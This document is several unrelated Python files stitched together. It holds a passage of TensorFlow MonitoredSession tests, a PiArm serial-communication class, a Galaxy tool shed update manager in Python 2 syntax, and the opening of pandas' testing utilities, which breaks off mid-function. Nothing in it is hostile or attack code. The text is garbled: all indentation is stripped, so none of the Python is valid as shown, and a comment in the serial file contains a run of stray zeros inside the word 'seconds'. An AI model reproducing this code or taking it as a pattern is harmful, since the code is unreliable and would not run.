stage_2 = state_ops.assign_add(var, 1.1)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(fetches=stage_1_0)
def after_run(self, run_context, run_values):
self._testing.assertNear(0.3 + 0.5 + 0.7,
run_context.session.run(var), 0.1)
self._testing.assertNear(0.3 + 0.5 + 0.7 + 1.1,
run_context.session.run(stage_2), 0.1)
def step_fn(step_context):
self.assertNear(0.3, step_context.session.run(stage_0), 0.1)
return step_context.run_with_hooks(fetches=stage_1_1)
with monitored_session.MonitoredSession(hooks=[Hook(self)]) as session:
self.assertEqual(0.3 + 0.5 + 0.7, session.run_step_fn(step_fn))
def test_step_fn_has_the_same_hooks_behavior_without_recovery(self):
with ops.Graph().as_default():
var = resource_variable_ops.ResourceVariable(0.0)
stage_0 = state_ops.assign_add(var, 0.3)
stage_1_0 = state_ops.assign_add(var, 0.7)
with ops.control_dependencies([stage_1_0]):
stage_1_1 = state_ops.assign_add(var, 0.5)
stage_2 = state_ops.assign_add(var, 1.1)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(fetches=stage_1_0)
def after_run(self, run_context, run_values):
self._testing.assertNear(0.3 + 0.5 + 0.7,
run_context.session.run(var), 0.1)
self._testing.assertNear(0.3 + 0.5 + 0.7 + 1.1,
run_context.session.run(stage_2), 0.1)
def step_fn(step_context):
self.assertNear(0.3, step_context.session.run(stage_0), 0.1)
return step_context.run_with_hooks(fetches=stage_1_1)
with monitored_session.SingularMonitoredSession(
hooks=[Hook(self)]) as session:
self.assertEqual(0.3 + 0.5 + 0.7, session.run_step_fn(step_fn))
def test_step_fn_with_hooks_and_request_stop(self):
with ops.Graph().as_default():
trace_the_hook = {'before_run': False, 'after_run': False}
class Hook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
trace_the_hook['before_run'] = True
def after_run(self, run_context, run_values):
trace_the_hook['after_run'] = True
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession(hooks=[Hook()]) as session:
self.assertEqual(None, session.run_step_fn(step_fn))
self.assertTrue(session.should_stop())
# `step_context.request_stop()` in a step_fn interrupts the flow of
# running the hooks.
self.assertFalse(trace_the_hook['before_run'])
self.assertFalse(trace_the_hook['after_run'])
def test_recovers_from_an_exception_in_step_fn(self):
trace_the_exception = {'run_already': False}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
with monitored_session.MonitoredSession() as session:
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.assertTrue(trace_the_exception['run_already'])
def test_recovers_from_an_exception_in_step_fn_after_hooks(self):
trace_the_exception = {'run_already': False, 'side_effect_counter': 0}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
graph_state = variables.VariableV1(0.0)
graph_side_effect = state_ops.assign_add(graph_state, 0.31)
def step_fn(step_context):
trace_the_exception['side_effect_counter'] += 1
step_context.session.run(graph_side_effect)
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return value
with self.cached_session() as test_session:
with monitored_session.MonitoredSession(
CountingSessionCreator(test_session)) as session:
session.run(variables.global_variables_initializer())
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.assertTrue(trace_the_exception['run_already'])
# Make sure the rest of the body of the step_fn is re-executed upon
# AbortedError:
self.assertEqual(2, trace_the_exception['side_effect_counter'])
self.assertNear(0.62, session.run(graph_state), 0.1)
def test_step_fn_doesnt_recover_when_it_wasnt_asked_to(self):
trace_the_exception = {'run_already': False}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
return value
with monitored_session.SingularMonitoredSession() as session:
with self.assertRaisesRegexp(errors_impl.AbortedError, 'Abort'):
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.fail()
self.assertTrue(trace_the_exception['run_already'])
def test_step_fn_exception_from_before_run(self):
trace_the_exception = {'run_already': False, 'side_effect_counter': 0}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
vv = constant_op.constant(3.2)
graph_state = variables.VariableV1(0.0)
graph_side_effect = state_ops.assign_add(graph_state, 0.31)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return session_run_hook.SessionRunArgs(fetches=vv)
def after_run(self, run_context, run_values):
self._testing.assertNear(3.2, run_values.results, 0.1)
def step_fn(step_context):
trace_the_exception['side_effect_counter'] += 1
step_context.session.run(graph_side_effect)
return step_context.run_with_hooks(fetches=v, feed_dict={c: 1.3})
with self.cached_session() as test_session:
with monitored_session.MonitoredSession(
CountingSessionCreator(test_session),
hooks=[Hook(self)]) as session:
test_session.run(variables.global_variables_initializer())
self.assertNear(1.3, session.run_step_fn(step_fn), 0.1)
self.assertEqual(2, trace_the_exception['side_effect_counter'])
self.assertNear(0.62, session.run(graph_state), 0.1)
class SingularMonitoredSessionTest(test.TestCase):
"""Tests SingularMonitoredSession."""
def test_handles_initialization(self):
with ops.Graph().as_default():
a_var = variables.VariableV1(0)
with monitored_session.SingularMonitoredSession() as session:
# If it's not initialized, following statement raises an error.
self.assertEqual(0, session.run(a_var))
def test_do_not_handle_aborted_error(self):
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
class _RaiseAbortedHook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
with self.assertRaises(errors_impl.AbortedError):
self.assertEqual(0, session.run(gstep))
with self.assertRaises(errors_impl.AbortedError):
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
self.assertEqual(0, session.run(gstep))
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.SingularMonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.SingularMonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.SingularMonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertEqual(None, session.raw_session())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.SingularMonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_raw_session(self):
with ops.Graph().as_default():
with monitored_session.SingularMonitoredSession() as session:
self.assertTrue(isinstance(session.raw_session(), session_lib.Session))
if __name__ == '__main__':
test.main()
|
serial_comm.py | #!/usr/bin/python3
'''
This file handle serial read and write
'''
import serial
import logging
import threading
from tkinter import messagebox
class SerialComm(object):
'''
Low level serial operations
'''
log = logging.getLogger('piarm.serial.SerialComm')
# Default timeout for serial reading(se 0000000000000000000000000000000conds)
timeout = 5
def __init__(self, handlerNotification=None, *args, **kwargs):
self.alive = False
self.timeout = 0.01
self._dataRecieved = False
self._responseEvent = None
self._expectResponse = None
self._response = None
self._rxData = []
self._notification = []
self._txLock = threading.Lock()
self.handlerNotification = handlerNotification
def connect(self, commPort, baud = 115200):
'''
Connects to the Comm Port
'''
try:
self.serial = serial.Serial(port=commPort,baudrate=baud,timeout=self.timeout)
self.alive = True
self.rxThread = threading.Thread(target=self._readLoop)
self.rxThread.daemon = True
self.rxThread.start()
return True
except serial.serialutil.SerialException:
messagebox.showerror("Port Error", "Couldn't Open Port..!!")
def disconnect(self):
'''
Stops read thread, waits for it to exit cleanly and close serial port
'''
self.alive = False
self.rxThread.join()
self.serial.close()
self.log.info('PiArm Disconnected Succesfully..!!')
def _handleLineRead(self, line, checkResponse=True):
'''
Handle serially received data
'''
if self._responseEvent and not self._responseEvent.is_set():
self._response = line
if not checkResponse:
# End of response reached; notify waiting thread
self.log.debug('response: %s', self._response)
self._responseEvent.set()
else:
# Nothing was waiting for this - treat it as notification
self._notification.append(line)
if self.serial.inWaiting() == 0:
# No more chars for this notification
#self.log.debug('notification: %s', self._notification)
self.log.debug('notification: Serial Device Connected')
self._notification = []
def _readLoop(self):
'''
Read thread main loop
'''
try:
while self.alive:
data = self.serial.read(1)
if data != b'':
self._dataRecieved = True
self._rxData.append(data)
elif data == b'' and self._dataRecieved == True:
self._dataRecieved = False
self._handleLineRead(self._rxData, checkResponse = False)
self._rxData = []
except serial.SerialException as err:
self.alive = False
try:
self.serial.close()
except Exception:
pass
def write(self, data, waitForResponse=True, timeout= 1, byteCount= 0):
'''
Write data to serial port
'''
with self._txLock:
if waitForResponse:
self._response = []
self._responseEvent = threading.Event()
self.serial.write(data)
if self._responseEvent.wait(timeout):
self._responseEvent = None
self._expectResponse = False
return self._response
else:
self._responseEvent = None
self._expectResponse = False
# raise Timeout Exception
else:
self.serial.write(data)
|
update_repository_manager.py | """
Determine if installed tool shed repositories have updates available in their respective tool sheds.
"""
import logging
import threading
import tool_shed.util.shed_util_common as suc
from tool_shed.util import common_util
from tool_shed.util import encoding_util
log = logging.getLogger( __name__ )
class UpdateRepositoryManager( object ):
def __init__( self, app ):
self.app = app
self.context = self.app.install_model.context
# Ideally only one Galaxy server process should be able to check for repository updates.
if self.app.config.enable_tool_shed_check:
self.running = True
self.sleeper = Sleeper()
self.restarter = threading.Thread( target=self.__restarter )
self.restarter.daemon = True
self.restarter.start()
self.seconds_to_sleep = int( app.config.hours_between_check * 3600 )
def get_update_to_changeset_revision_and_ctx_rev( self, repository ):
"""Return the changeset revision hash to which the repository can be updated."""
changeset_revision_dict = {}
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry( self.app, str( repository.tool_shed ) )
params = '?name=%s&owner=%s&changeset_revision=%s' % ( str( repository.name ),
str( repository.owner ),
str( repository.installed_changeset_revision ) )
url = common_util.url_join( tool_shed_url, 'repository/get_changeset_revision_and_ctx_rev%s' % params )
try:
encoded_update_dict = common_util.tool_shed_get( self.app, tool_shed_url, url )
if encoded_update_dict:
update_dict = encoding_util.tool_shed_decode( encoded_update_dict )
includes_data_managers = update_dict.get( 'includes_data_managers', False )
includes_datatypes = update_dict.get( 'includes_datatypes', False )
includes_tools = update_dict.get( 'includes_tools', False )
includes_tools_for_display_in_tool_panel = update_dict.get( 'includes_tools_for_display_in_tool_panel', False )
includes_tool_dependencies = update_dict.get( 'includes_tool_dependencies', False )
includes_workflows = update_dict.get( 'includes_workflows', False )
has_repository_dependencies = update_dict.get( 'has_repository_dependencies', False )
has_repository_dependencies_only_if_compiling_contained_td = update_dict.get( 'has_repository_dependencies_only_if_compiling_contained_td', False )
changeset_revision = update_dict.get( 'changeset_revision', None )
ctx_rev = update_dict.get( 'ctx_rev', None )
changeset_revision_dict[ 'includes_data_managers' ] = includes_data_managers
changeset_revision_dict[ 'includes_datatypes' ] = includes_datatypes
changeset_revision_dict[ 'includes_tools' ] = includes_tools
changeset_revision_dict[ 'includes_tools_for_display_in_tool_panel' ] = includes_tools_for_display_in_tool_panel
changeset_revision_dict[ 'includes_tool_dependencies' ] = includes_tool_dependencies
changeset_revision_dict[ 'includes_workflows' ] = includes_workflows
changeset_revision_dict[ 'has_repository_dependencies' ] = has_repository_dependencies
changeset_revision_dict[ 'has_repository_dependencies_only_if_compiling_contained_td' ] = has_repository_dependencies_only_if_compiling_contained_td
changeset_revision_dict[ 'changeset_revision' ] = changeset_revision
changeset_revision_dict[ 'ctx_rev' ] = ctx_rev
except Exception, e:
log.debug( "Error getting change set revision for update from the tool shed for repository '%s': %s" % ( repository.name, str( e ) ) )
changeset_revision_dict[ 'includes_data_managers' ] = False
changeset_revision_dict[ 'includes_datatypes' ] = False
changeset_revision_dict[ 'includes_tools' ] = False
changeset_revision_dict[ 'includes_tools_for_display_in_tool_panel' ] = False
changeset_revision_dict[ 'includes_tool_dependencies' ] = False
changeset_revision_dict[ 'includes_workflows' ] = False
changeset_revision_dict[ 'has_repository_dependencies' ] = False
changeset_revision_dict[ 'has_repository_dependencies_only_if_compiling_contained_td' ] = False
changeset_revision_dict[ 'changeset_revision' ] = None
changeset_revision_dict[ 'ctx_rev' ] = None
return changeset_revision_dict
def __restarter( self ):
log.info( 'Update repository manager restarter starting up...' )
while self.running:
# Make a call to the Tool Shed for each installed repository to get the latest
# status information in the Tool Shed for the repository. This information includes
# items like newer installable repository revisions, current revision updates, whether
# the repository revision is the latest installable revision, and whether the repository
# has been deprecated in the Tool Shed.
for repository in self.context.query( self.app.install_model.ToolShedRepository ) \
.filter( self.app.install_model.ToolShedRepository.table.c.deleted == False ):
tool_shed_status_dict = suc.get_tool_shed_status_for_installed_repository( self.app, repository )
if tool_shed_status_dict:
if tool_shed_status_dict != repository.tool_shed_status:
repository.tool_shed_status = tool_shed_status_dict
self.context.flush()
else:
# The received tool_shed_status_dict is an empty dictionary, so coerce to None.
tool_shed_status_dict = None
if tool_shed_status_dict != repository.tool_shed_status:
repository.tool_shed_status = tool_shed_status_dict
self.context.flush()
self.sleeper.sleep( self.seconds_to_sleep )
log.info( 'Update repository manager restarter shutting down...' )
def shutdown( self ):
if self.app.config.enable_tool_shed_check:
self.running = False
self.sleeper.wake()
def update_repository_record( self, repository, updated_metadata_dict, updated_changeset_revision, updated_ctx_rev ):
"""
Update a tool_shed_repository database record with new information retrieved from the
Tool Shed. This happens when updating an installed repository to a new changeset revision.
"""
repository.metadata = updated_metadata_dict
# Update the repository.changeset_revision column in the database.
repository.changeset_revision = updated_changeset_revision
repository.ctx_rev = updated_ctx_rev
# Update the repository.tool_shed_status column in the database.
tool_shed_status_dict = suc.get_tool_shed_status_for_installed_repository( self.app, repository )
if tool_shed_status_dict:
repository.tool_shed_status = tool_shed_status_dict
else:
repository.tool_shed_status = None
self.app.install_model.context.add( repository )
self.app.install_model.context.flush()
self.app.install_model.context.refresh( repository )
return repository
class Sleeper( object ):
"""
Provides a 'sleep' method that sleeps for a number of seconds *unless* the notify method
is called (from a different thread).
"""
def __init__( self ):
self.condition = threading.Condition()
def sleep( self, seconds ):
self.condition.acquire()
self.condition.wait( seconds )
self.condition.release()
def wake( self ):
self.condition.acquire()
self.condition.notify()
self.condition.release()
|
testing.py | import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import http.client
import lzma
import os
import re
from shutil import rmtree
import string
import tempfile
import traceback
from typing import Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas.compat import raise_with_traceback
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(obj, path=None):
"""
Pickle an object and then read it again.
Parameters
----------
obj : pandas object
The object to pickle and then re-read.
path : str, default None
The path where the pickled object is written and then read.
Returns
-------
round_trip_pickled_object : pandas object
The original object that was pickled and then re-read.
"""
if path is None:
path = "__{random_bytes}__.pickle".format(random_bytes=rands(10))
with ensure_clean(path) as path:
pd.to_pickle(obj, path)
return pd.read_pickle(path)
def round_trip_pathlib(writer, reader, path=None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
round_trip_object : pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path=None):
"""
Write an object to file specified by a py.path LocalPath and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
round_trip_object : pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object
Parameters
----------
path : str
The path where the file is read from
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
f : file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = lzma.LZMAFile(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError("ZIP file {} error. Only one file per ZIP.".format(path))
else:
msg = "Unrecognized compression type: {}".format(compression)
raise ValueError(msg)
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
import lzma
compress_method = lzma.LZMAFile
else:
msg = "Unrecognized compression type: {}".format(compression)
raise ValueError(msg)
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left, right, check_dtype="equiv", check_less_precise=False, **kwargs
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool / string {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
err_msg = "{name} Expected type {exp_type}, found {act_type} instead"
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(left))
)
if not isinstance(right, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(right))
)
def assert_dict_equal(left, right, compare_keys=True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p=0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""Generate an array of byte strings."""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""Generate an array of unicode strings."""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ""
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except Exception:
print(
"Couldn't close file descriptor: {fdesc} (file: {fname})".format(
fdesc=fd, fname=filename
)
)
try:
if os.path.exists(filename):
os.remove(filename)
except Exception as e:
print("Exception on removing file: {error}".format(error=e))
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except Exception:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2):
"""Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string", "unicode"):
assert r.inferred_type in ("string", "unicode")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
labels = index.codes[level]
filled = take_1d(unique.values, labels, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = "{obj} levels are different".format(obj=obj)
msg2 = "{nlevels}, {left}".format(nlevels=left.nlevels, left=left)
msg3 = "{nlevels}, {right}".format(nlevels=right.nlevels, right=right)
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = "{obj} length are different".format(obj=obj)
msg2 = "{length}, {left}".format(length=len(left), left=left)
msg3 = "{length}, {right}".format(length=len(right), right=right)
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = "MultiIndex level [{level}]".format(level=level)
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = "{obj} values are different ({pct} %)".format(
obj=obj, pct=np.round(diff, 5)
)
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left.values, right.values, obj="{obj} category".format(obj=obj)
)
def assert_class_equal(left, right, exact=True, obj="Input"):
"""checks classes are equal."""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return x.__class__.__name__
